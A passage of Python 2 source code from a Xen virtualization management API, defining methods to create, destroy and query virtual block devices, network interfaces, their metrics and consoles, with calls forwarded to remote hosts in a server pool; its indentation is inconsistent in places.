# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'R',
'type' : 'Disk',
}
response = self._VBD_create(session, vbd_struct)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
def VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: VM delete data VBD and VDI.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_delete_data_VBD', vm_ref, vdi_ref)
else:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
    def _VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Destroy the (first) VBD attached to the
            given VDI, serialised under __vbd_lock__. Returns False on any
            failure, True on success.
        @see: VM_delete_data_VBD
        '''
        self.__vbd_lock__.acquire()
        try:
            log.debug("=====VM_delete_data_VBD=====")
            log.debug('VDI ref: %s' % vdi_ref)
            vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
            vbd = []
            vbd_ref = ""
            if vdi:
                log.debug('get VBDs by VDI:')
                vbd = vdi.getVBDs()
                log.debug(vbd)
            else:
                return xen_api_success(False)
            # Only the first attached VBD is destroyed -- presumably a data
            # VDI has exactly one VBD; confirm against callers.
            if vbd and isinstance(vbd, list):
                vbd_ref = vbd[0]
            else:
                return xen_api_success(False)
            log.debug("vbd ref: %s" % vbd_ref)
            response = self.VBD_destroy(session, vbd_ref)
            if cmp(response.get('Status'), 'Success') == 0:
                return xen_api_success(True)
            else:
                return xen_api_success(False)
        except Exception, exn:
            log.exception(exn)
            return xen_api_success(False)
        finally:
            # Lock is always released, even on early return.
            self.__vbd_lock__.release()
# Xen API: Class VBD
# ----------------------------------------------------------------
VBD_attr_ro = ['VM',
'VDI',
'metrics',
'runtime_properties',
'io_read_kbs',
'io_write_kbs']
VBD_attr_rw = ['device',
'bootable',
'mode',
'type']
VBD_attr_inst = VBD_attr_rw
VBD_methods = [('media_change', None), ('destroy', None), ('destroy_on', None)]
VBD_funcs = [('create', 'VBD'),
('create_on', 'VBD')]
    # object methods
    def VBD_get_record(self, session, vbd_ref):
        '''Build the full VBD record dict, filtering to the declared attrs.'''
        storage = self._get_BNStorageAPI_instance()
        xendom = XendDomain.instance()
        vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
        if not vm:
            return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
        cfg = vm.get_dev_xenapi_config('vbd', vbd_ref)
        if not cfg:
            return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
        valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
                         self.Base_attr_ro + self.Base_attr_rw
        return_cfg = {}
        for k in cfg.keys():
            if k in valid_vbd_keys:
                return_cfg[k] = cfg[k]
        # The metrics ref is the VBD ref itself.
        return_cfg['metrics'] = vbd_ref
        return_cfg['runtime_properties'] = {} #todo
        return_cfg['io_read_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_read_kbs')
        return_cfg['io_write_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_write_kbs')
        # Expose the backing VDI location as 'userdevice' when resolvable.
        if return_cfg.has_key('VDI') and return_cfg.get('VDI'):
            location = storage.VDI_get_location(session, return_cfg.get('VDI')).get('Value')
            if location:
                return_cfg['userdevice'] = location
#        log.debug(return_cfg)
        return xen_api_success(return_cfg)
    def VBD_media_change(self, session, vbd_ref, new_vdi_ref):
        '''Swap the media of a read-only CD VBD to another VDI.

        Fails with HANDLE_INVALID unless the VBD exists, is of type CD and
        is mounted read-only.
        '''
        xendom = XendDomain.instance()
        xennode = XendNode.instance()
        vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
        if not vm:
            return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
        cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
        if not cur_vbd_struct:
            return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
        if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]:   # Not CD
            return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
        if cur_vbd_struct['mode'] != 'RO':   # Not read only
            return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
        new_vdi = xennode.get_vdi_by_uuid(new_vdi_ref)
        if not new_vdi:
            return xen_api_error(['HANDLE_INVALID', 'VDI', new_vdi_ref])
        new_vdi_image = new_vdi.get_location()
        valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
                         self.Base_attr_ro + self.Base_attr_rw
        # Rebuild the VBD struct from the current one, then repoint the VDI.
        new_vbd_struct = {}
        for k in cur_vbd_struct.keys():
            if k in valid_vbd_keys:
                new_vbd_struct[k] = cur_vbd_struct[k]
        new_vbd_struct['VDI'] = new_vdi_ref
        try:
            XendTask.log_progress(0, 100,
                                  vm.change_vdi_of_vbd,
                                  new_vbd_struct, new_vdi_image)
        except XendError, e:
            log.exception("Error in VBD_media_change")
            return xen_api_error(['INTERNAL_ERROR', str(e)])
        return xen_api_success_void()
    # class methods
    def VBD_create_on(self, session, vbd_struct, host_ref):
        '''Create a VBD on the given host; CD VDIs are translated to the
        remote host's VDI ref by name_label before forwarding.'''
        storage = self._get_BNStorageAPI_instance()
#        log.debug(vbd_struct)
        if BNPoolAPI._isMaster:
            vbd_type = vbd_struct.get('type')
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self.VBD_create(session, vbd_struct)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                # CD media: local VDI refs are meaningless on the remote
                # host, so resolve by name_label there first.
                if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
                    vdi = vbd_struct.get('VDI')
                    if vdi:
                        log.debug(storage.VDI_get_name_label(session, vdi))
                        vdi_name = storage.VDI_get_name_label(session, vdi).get('Value')
                        if vdi_name:
                            remote_vdi = xen_rpc_call(remote_ip, 'VDI_get_by_name_label', vdi_name).get('Value')
                            if remote_vdi:
                                vbd_struct['VDI'] = remote_vdi
                            else:
                                return xen_api_error(['%s VDI %s not find!' % (remote_ip, vdi_name)])
                        else:
                            return xen_api_error(['Invaild VDI %s' % vdi])
                    else:
                        return xen_api_error(['vbd struct error, VDI not define.'])
                return xen_rpc_call(remote_ip, 'VBD_create', vbd_struct)
        else:
            return self.VBD_create(session, vbd_struct)
def VBD_create(self, session, vbd_struct):
vm_ref = vbd_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VBD_create(session, vbd_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VBD_create', vbd_struct)
else:
return self._VBD_create(session, vbd_struct)
    def _VBD_create(self, session, vbd_struct):
        '''Create the VBD locally from the given struct; the backing VDI must
        already exist. Persists the VM config on success.'''
        xendom = XendDomain.instance()
        xennode = XendNode.instance()
        if not xendom.is_valid_vm(vbd_struct['VM']):
            return xen_api_error(['VM_NOT_FOUND', 'VM', vbd_struct['VM']])
        dom = xendom.get_vm_by_uuid(vbd_struct['VM'])
        vdi = xennode.get_vdi_by_uuid(vbd_struct['VDI'])
        if not vdi:
            return xen_api_error(['HANDLE_INVALID', 'VDI', vbd_struct['VDI']])
        # new VBD via VDI/SR
        vdi_image = vdi.get_location()
        log.debug("vdi location: %s" % vdi_image)
        try:
            vbd_ref = XendTask.log_progress(0, 100,
                                            dom.create_vbd_for_xenapi,
                                            vbd_struct, vdi_image)
            log.debug('VBD_create %s' % vbd_ref)
        except XendError, e:
            log.exception("Error in VBD_create")
            return xen_api_error(['INTERNAL_ERROR', str(e)])
        xendom.managed_config_save(dom)
        return xen_api_success(vbd_ref)
def VBD_destroy(self, session, vbd_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
# vdi_ref = XendDomain.instance()\
# .get_dev_property_by_uuid('vbd', vbd_ref, "VDI")
# vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
XendTask.log_progress(0, 100, vm.destroy_vbd, vbd_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def VBD_destroy_on(self, session, vbd_ref, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_destroy(session, vbd_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, "VBD_destroy", vbd_ref)
else:
return self.VBD_destroy(session, vbd_ref)
    def _VBD_get(self, vbd_ref, prop):
        # Generic read of a single VBD device property.
        return xen_api_success(
            XendDomain.instance().get_dev_property_by_uuid(
            'vbd', vbd_ref, prop))
    # attributes (ro)
    def VBD_get_metrics(self, _, vbd_ref):
        # VBD_metrics objects share the VBD's own ref.
        return xen_api_success(vbd_ref)
    def VBD_get_runtime_properties(self, _, vbd_ref):
        '''Return the live xenstore sxp record for this VBD, matched by its
        virtual-device id; {} on any failure.'''
        xendom = XendDomain.instance()
        dominfo = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
        device = dominfo.get_dev_config_by_uuid('vbd', vbd_ref)
        try:
            devid = int(device['id'])
            device_sxps = dominfo.getDeviceSxprs('vbd')
            # sxp -> dict; [0:] keeps the whole attribute list.
            device_dicts = [dict(device_sxp[1][0:]) for device_sxp in device_sxps]
            device_dict = [device_dict
                           for device_dict in device_dicts
                           if int(device_dict['virtual-device']) == devid][0]
            return xen_api_success(device_dict)
        except Exception, exn:
            log.exception(exn)
            return xen_api_success({})
    # attributes (rw)
    def VBD_get_VM(self, session, vbd_ref):
        # Ref of the VM this VBD belongs to.
        return self._VBD_get(vbd_ref, 'VM')
    def VBD_get_VDI(self, session, vbd_ref):
        # Ref of the backing VDI.
        return self._VBD_get(vbd_ref, 'VDI')
    def VBD_get_device(self, session, vbd_ref):
        # Guest device name, e.g. 'xvda'.
        return self._VBD_get(vbd_ref, 'device')
    def VBD_get_bootable(self, session, vbd_ref):
        return self._VBD_get(vbd_ref, 'bootable')
    def VBD_get_mode(self, session, vbd_ref):
        return self._VBD_get(vbd_ref, 'mode')
    def VBD_get_type(self, session, vbd_ref):
        return self._VBD_get(vbd_ref, 'type')
def VBD_set_bootable(self, session, vbd_ref, bootable):
bootable = bool(bootable)
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'bootable', int(bootable))
xd.managed_config_save(vm)
return xen_api_success_void()
    def VBD_set_mode(self, session, vbd_ref, mode):
        '''Persistently set the VBD access mode.'''
        # NOTE(review): the stored values here are 'w'/'r', while
        # _VM_create_data_VBD stores 'RW'/'R' -- presumably the backend
        # accepts both spellings; confirm before unifying.
        if mode == 'RW':
            mode = 'w'
        else:
            mode = 'r'
        xd = XendDomain.instance()
        vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
        vm.set_dev_property('vbd', vbd_ref, 'mode', mode)
        xd.managed_config_save(vm)
        return xen_api_success_void()
def VBD_set_VDI(self, session, vbd_ref, VDI):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'VDI', VDI)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_get_all(self, session):
xendom = XendDomain.instance()
vbds = [d.get_vbds() for d in XendDomain.instance().list('all')]
vbds = reduce(lambda x, y: x + y, vbds)
return xen_api_success(vbds)
# Xen API: Class VBD_metrics
# ----------------------------------------------------------------
VBD_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'last_updated']
VBD_metrics_attr_rw = []
VBD_metrics_methods = []
    def VBD_metrics_get_all(self, session):
        # Metrics refs are the VBD refs themselves.
        return self.VBD_get_all(session)
    def VBD_metrics_get_record(self, _, ref):
        '''Assemble the metrics record for one VBD; last_updated is "now".'''
        vm = XendDomain.instance().get_vm_with_dev_uuid('vbd', ref)
        if not vm:
            return xen_api_error(['HANDLE_INVALID', 'VBD_metrics', ref])
        return xen_api_success(
            { 'io_read_kbs'  : vm.get_dev_property('vbd', ref, 'io_read_kbs'),
              'io_write_kbs' : vm.get_dev_property('vbd', ref, 'io_write_kbs'),
              'last_updated' : now()
            })
    def VBD_metrics_get_io_read_kbs(self, _, ref):
        # Read throughput in KB/s.
        return self._VBD_get(ref, 'io_read_kbs')
    def VBD_metrics_get_io_write_kbs(self, session, ref):
        # Write throughput in KB/s.
        return self._VBD_get(ref, 'io_write_kbs')
    def VBD_metrics_get_last_updated(self, _1, _2):
        # Metrics are computed on demand, so "last updated" is always now.
        return xen_api_success(now())
# Xen API: Class VIF
# ----------------------------------------------------------------
VIF_attr_ro = ['network',
'VM',
'metrics',
'runtime_properties']
VIF_attr_rw = ['device',
'MAC',
'MTU',
'security_label',
'physical_network',
'physical_network_local',
]
VIF_attr_inst = VIF_attr_rw
VIF_methods = [('destroy', None)]
VIF_funcs = [('create', 'VIF'),
('create_on', 'VIF'),
('create_bind_to_physical_network', None)
]
    # object methods
    def VIF_get_record(self, session, vif_ref):
        '''Build the full VIF record dict, filtering to the declared attrs.'''
        xendom = XendDomain.instance()
        vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
        if not vm:
            return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
        cfg = vm.get_dev_xenapi_config('vif', vif_ref)
        if not cfg:
            return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
        valid_vif_keys = self.VIF_attr_ro + self.VIF_attr_rw + \
                         self.Base_attr_ro + self.Base_attr_rw
        return_cfg = {}
        for k in cfg.keys():
            if k in valid_vif_keys:
                return_cfg[k] = cfg[k]
        # The metrics ref is the VIF ref itself.
        return_cfg['metrics'] = vif_ref
        return xen_api_success(return_cfg)
    # class methods
    def VIF_create_on(self, session, vif_struct, host_ref):
        '''Create a VIF on the given host; a missing/null network defaults to
        the 'ovs1' bridge before the create is dispatched.'''
        if BNPoolAPI._isMaster:
            network = vif_struct.get('network')
            log.debug("get network from rec: %s", network)
            #if network:
            #    log.debug(xenapi.network_get_name_label(session, network))
            #    network_label = xenapi.network_get_name_label(session, network).get('Value')
    #            log.debug(network_label)
            #else:
            #    vif_struct['network'] = 'ovs0'
            #    log.debug("get from network : %s" % vif_struct.get('network'))
                #return xen_api_error(['network not found'])
            # Default the bridge when the caller passed no usable network ref.
            if not network or cmp(network, 'OpaqueRef:NULL') == 0:
                vif_struct['network'] = 'ovs1'
                log.debug("get from network : %s" % vif_struct.get('network'))
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self.VIF_create(session, vif_struct)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                #remote_network = xen_rpc_call(remote_ip, 'network_get_by_name_label', network_label).get('Value')
                #if remote_network:
                #    log.debug(remote_network[0])
                #    vif_struct['network'] = remote_network[0]
                #else:
                #    return xen_api_error(['%s network not found!' % remote_ip, 'Network'])
                return xen_rpc_call(remote_ip, 'VIF_create', vif_struct)
        else:
            network = vif_struct.get('network')
            log.debug("get network from rec: %s", network)
            # Same default as the master path above.
            if not network or cmp(network, 'OpaqueRef:NULL') == 0:
                vif_struct['network'] = 'ovs1'
                log.debug("get from network : %s" % vif_struct.get('network'))
            return self.VIF_create(session, vif_struct)
def VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
if BNPoolAPI._isMaster:
vm_ref = vif_struct.get('VM', '')
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create_bind_to_physical_network', vif_struct, phy_network)
else:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
    def _VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
        '''Validate the interface count and the named network, then create
        the VIF bound to that network locally.'''
        vm_ref = vif_struct.get('VM', '')
        vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
        # Enforce the per-VM interface cap.
        if vifs:
            if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
                return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
        xenapi = self._get_XendAPI_instance()
        log.debug('VIF create bind to physical network')
        network_refs = xenapi.network_get_all(session).get('Value')
        network_names = []
        for ref in network_refs:
            namelabel = xenapi.network_get_name_label(session, ref).get('Value')
            network_names.append(namelabel)
#        log.debug(network_names)
        if phy_network not in network_names:
            return xen_api_error(['Network name do not exist!'] + network_names)
        vif_struct['network'] = phy_network
        log.debug("get from network : %s" % vif_struct.get('network'))
        return self._VIF_create(session, vif_struct)
'''
set physical network for vm, pass the refer
'''
def VIF_set_physical_network(self, session, vif_ref, vm_ref, phy_network):
log.debug('VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_set_physical_network', vif_ref, vm_ref, phy_network)
else:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
def VIF_set_physical_network_local(self, session, vif_ref, vm_ref, phy_network):
xenapi = self._get_XendAPI_instance()
log.debug('local method VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
network_refs = xenapi.network_get_all(session).get('Value')
network_names = {}
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names[namelabel] = ref
log.debug(network_names)
if phy_network not in network_names:
return xen_api_error(['Network name do not exist!'] + network_names)
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
log.debug('vif cannot be found on vm!')
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
# if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
# log.debug('VM(%s) is running!' % vm_ref)
# return xen_api_error(['VM is running!'])
try:
origin_network = self.VIF_get_network(session, vif_ref).get('Value')
except:
log.exception("VIF did not have Network field.")
origin_network = None
new_network = network_names[phy_network]
origin_bridge = self._VIF_get(vif_ref, 'bridge').get('Value')
# origin_bridge = xenapi.network_get_name_label(session, origin_network).get('Value')
new_bridge = phy_network
# log.debug('origin_network: %s and new_network: %s' % (origin_network, new_network))
# log.debug('origin_bridge: %s and new_bridge: %s' % (origin_bridge, new_bridge))
#must set both network and bridge, or set bridge only,
#do not set network only, set network only won't work
rc = True
rc1 = True
if origin_network and cmp(origin_network, new_network) != 0 :
rc = self._VIF_set(vif_ref, 'network', new_network, origin_network)
if cmp(origin_bridge, new_bridge) != 0:
rc1 = self._VIF_set(vif_ref, 'bridge', new_bridge, origin_bridge)
if rc == False or rc1 == False:
log.error('set vif physical network failed')
return xen_api_error(['set vif physical network failed'])
return xen_api_success_void()
def VIF_create(self, session, vif_struct):
vm_ref = vif_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create(session, vif_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create', vif_struct)
else:
return self._VIF_create(session, vif_struct)
    def _VIF_create(self, session, vif_struct):
        '''Create the VIF locally after validating the VM, the per-VM
        interface cap and the MAC format; persists the VM config.'''
        xendom = XendDomain.instance()
        mac = vif_struct.get('MAC')
        vm_ref = vif_struct.get('VM')
        if not xendom.is_valid_vm(vm_ref):
            return xen_api_error(['VM_NOT_FOUND', 'VM', vif_struct.get('VM')])
        vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
        if vifs:
            if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
                return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
        # An empty MAC is allowed (one will be generated); a malformed one
        # is rejected here.
        if not self._VIF_is_mac_format_legal(mac):
            return xen_api_error(['MAC_INVALID'])
        dom = xendom.get_vm_by_uuid(vif_struct.get('VM'))
        try:
            vif_ref = dom.create_vif(vif_struct)
            xendom.managed_config_save(dom)
            return xen_api_success(vif_ref)
        except XendError, exn:
            return xen_api_error(['INTERNAL_ERROR', str(exn)])
def _VIF_is_mac_format_legal(self, mac):
mac_re = re.compile("00:16:3e:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]")
if not mac:
return True
if mac and cmp(mac_re.match(mac), None) != 0:
return True
return False
def VIF_destroy(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
vm.destroy_vif(vif_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
    def _VIF_get(self, ref, prop):
        # Generic read of a single VIF device property.
        return xen_api_success(
            XendDomain.instance().get_dev_property_by_uuid('vif', ref, prop))
    # getters/setters
    def VIF_get_metrics(self, _, vif_ref):
        # VIF_metrics objects share the VIF's own ref.
        return xen_api_success(vif_ref)
    def VIF_get_VM(self, session, vif_ref):
        # Resolve the owning VM's uuid from the device index.
        xendom = XendDomain.instance()
        vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
        return xen_api_success(vm.get_uuid())
    def VIF_get_MTU(self, session, vif_ref):
        return self._VIF_get(vif_ref, 'MTU')
    def VIF_get_MAC(self, session, vif_ref):
        return self._VIF_get(vif_ref, 'MAC')
    def VIF_get_device(self, session, vif_ref):
        return self._VIF_get(vif_ref, 'device')
    def VIF_get_network(self, session, vif_ref):
        return self._VIF_get(vif_ref, 'network')
def VIF_get_all(self, session):
xendom = XendDomain.instance()
vifs = [d.get_vifs() for d in XendDomain.instance().list('all')]
vifs = reduce(lambda x, y: x + y, vifs)
return xen_api_success(vifs)
    def VIF_get_runtime_properties(self, _, vif_ref):
        '''Return the live xenstore sxp record for this VIF, matched by its
        handle id; {} on any failure.'''
        xendom = XendDomain.instance()
        dominfo = xendom.get_vm_with_dev_uuid('vif', vif_ref)
        device = dominfo.get_dev_config_by_uuid('vif', vif_ref)
        try:
            devid = int(device['id'])
            device_sxps = dominfo.getDeviceSxprs('vif')
            # NOTE(review): slices from [1:] while the VBD variant uses [0:]
            # -- presumably the first element differs; confirm in sxp layout.
            device_dicts = [dict(device_sxp[1][1:])
                            for device_sxp in device_sxps]
            device_dict = [device_dict
                           for device_dict in device_dicts
                           if int(device_dict['handle']) == devid][0]
            return xen_api_success(device_dict)
        except Exception, exn:
            log.exception(exn)
            return xen_api_success({})
    def VIF_get_security_label(self, session, vif_ref):
        # Stored security label string for this VIF.
        return self._VIF_get(vif_ref, 'security_label')
    def _VIF_set(self, ref, prop, val, old_val):
        # Compare-and-set of a VIF property; presumably returns False when
        # old_val no longer matches -- confirm in XendDomain.
        return XendDomain.instance().set_dev_property_by_uuid(
            'vif', ref, prop, val, old_val)
    def VIF_set_security_label(self, session, vif_ref, sec_lab, old_lab):
        '''Compare-and-set the VIF security label; refused while the owning
        VM is running.'''
        xendom = XendDomain.instance()
        dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
        if not dom:
            return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
        if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
            raise SecurityError(-xsconstants.XSERR_RESOURCE_IN_USE)
        rc = self._VIF_set(vif_ref, 'security_label', sec_lab, old_lab)
        if rc == False:
            # old_lab mismatch: the label changed under us.
            raise SecurityError(-xsconstants.XSERR_BAD_LABEL)
        return xen_api_success(xsconstants.XSERR_SUCCESS)
# Xen API: Class VIF_metrics
# ----------------------------------------------------------------
VIF_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'io_total_read_kbs',
'io_total_write_kbs',
'last_updated']
VIF_metrics_attr_rw = []
VIF_metrics_methods = []
    def VIF_metrics_get_all(self, session):
        # VIF metrics share the VIF refs, so delegate to VIF_get_all.
        return self.VIF_get_all(session)
    def VIF_metrics_get_record(self, _, ref):
        """Return the full metrics record for a VIF.

        NOTE(review): 'last_updated' is filled with now() rather than a
        stored timestamp -- presumably intentional, confirm with callers.
        """
        vm = XendDomain.instance().get_vm_with_dev_uuid('vif', ref)
        if not vm:
            return xen_api_error(['HANDLE_INVALID', 'VIF_metrics', ref])
        return xen_api_success(
            { 'io_read_kbs'  : vm.get_dev_property('vif', ref, 'io_read_kbs'),
              'io_write_kbs' : vm.get_dev_property('vif', ref, 'io_write_kbs'),
              'io_total_read_kbs'  : vm.get_dev_property('vif', ref, 'io_total_read_kbs'),
              'io_total_write_kbs' : vm.get_dev_property('vif', ref, 'io_total_write_kbs'),
              'last_updated' : now()
            })
    def VIF_metrics_get_io_read_kbs(self, _, ref):
        # Read throughput metric, in kb/s.
        return self._VIF_get(ref, 'io_read_kbs')
    def VIF_metrics_get_io_write_kbs(self, session, ref):
        # Write throughput metric, in kb/s.
        return self._VIF_get(ref, 'io_write_kbs')
    def VIF_metrics_get_io_total_read_kbs(self, _, ref):
        # Cumulative read volume metric, in kb.
        return self._VIF_get(ref, 'io_total_read_kbs')
    def VIF_metrics_get_io_total_write_kbs(self, session, ref):
        # Cumulative write volume metric, in kb.
        return self._VIF_get(ref, 'io_total_write_kbs')
    def VIF_metrics_get_last_updated(self, _1, _2):
        # Metrics are computed on demand, so "last updated" is always now.
        return xen_api_success(now())
# Xen API: Class console
# ----------------------------------------------------------------
console_attr_ro = ['location', 'protocol', 'VM']
console_attr_rw = ['other_config']
console_methods = [('destroy', None)]
console_funcs = [('create', 'console'),
('create_on', 'console')]
def console_get_all(self, session):
xendom = XendDomain.instance()
# cons = list(BNPoolAPI._consoles_to_VM.keys())
cons = [d.get_consoles() for d in XendDomain.instance().list('all')]
cons = reduce(lambda x, y: x + y, cons)
return xen_api_success(cons)
    def console_get_location(self, session, console_ref):
        """Return a console's location, forwarding to its host when pooled.

        On the pool master: answer locally if this node owns the console,
        otherwise forward the call over RPC to the owning host.
        """
        if BNPoolAPI._isMaster:
            host_ref = BNPoolAPI.get_host_by_console(console_ref)
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self._console_get_location(console_ref)
            else:
                host_ip = BNPoolAPI.get_host_ip(host_ref)
                return xen_rpc_call(host_ip, "console_get_location", console_ref)
        else:
            return self._console_get_location(console_ref)
    def _console_get_location(self, console_ref):
        # Local (non-forwarded) lookup of the console's 'location' property.
        xendom = XendDomain.instance()
        return xen_api_success(xendom.get_dev_property_by_uuid('console',
                                                               console_ref,
                                                               'location'))
    def console_get_protocol(self, session, console_ref):
        # Return the console's protocol (e.g. vnc/rfb) from its device config.
        xendom = XendDomain.instance()
        return xen_api_success(xendom.get_dev_property_by_uuid('console',
                                                               console_ref,
                                                               'protocol'))
    def console_get_VM(self, session, console_ref):
        # Return the UUID of the VM owning this console.
        xendom = XendDomain.instance()
        vm = xendom.get_vm_with_dev_uuid('console', console_ref)
        return xen_api_success(vm.get_uuid())
    def console_get_other_config(self, session, console_ref):
        # Return the console's free-form 'other_config' dictionary.
        xendom = XendDomain.instance()
        return xen_api_success(xendom.get_dev_property_by_uuid('console',
                                                               console_ref,
                                                               'other_config'))
# object methods
def _console_get_record(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
cfg = vm.get_dev_xenapi_config('console', console_ref)
log.debug(cfg)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
valid_console_keys = self.console_attr_ro + self.console_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_console_keys:
return_cfg[k] = cfg[k]
return xen_api_success(return_cfg)
def console_get_record(self, session, console_ref):
if BNPoolAPI._isMaster:
# try:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_record(session, console_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'console_get_record', console_ref)
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.console.get_record(session_ref, console_ref)
# except KeyError:
# return xen_api_error(['key error', console_ref])
# except socket.error:
# return xen_api_error(['socket error', console_ref])
else:
return self._console_get_record(session, console_ref)
    def console_create_on(self, session, console_struct, host_ref):
        """Create a console on a specific host, updating pool bookkeeping.

        When forwarding to a remote host succeeds, the pool data
        structures are updated with the new console -> VM mapping.
        """
        if BNPoolAPI._isMaster:
            if cmp(host_ref, XendNode.instance().uuid) == 0:
                return self.console_create(session, console_struct)
            else:
                remote_ip = BNPoolAPI.get_host_ip(host_ref)
                response = xen_rpc_call(remote_ip, 'console_create', console_struct)
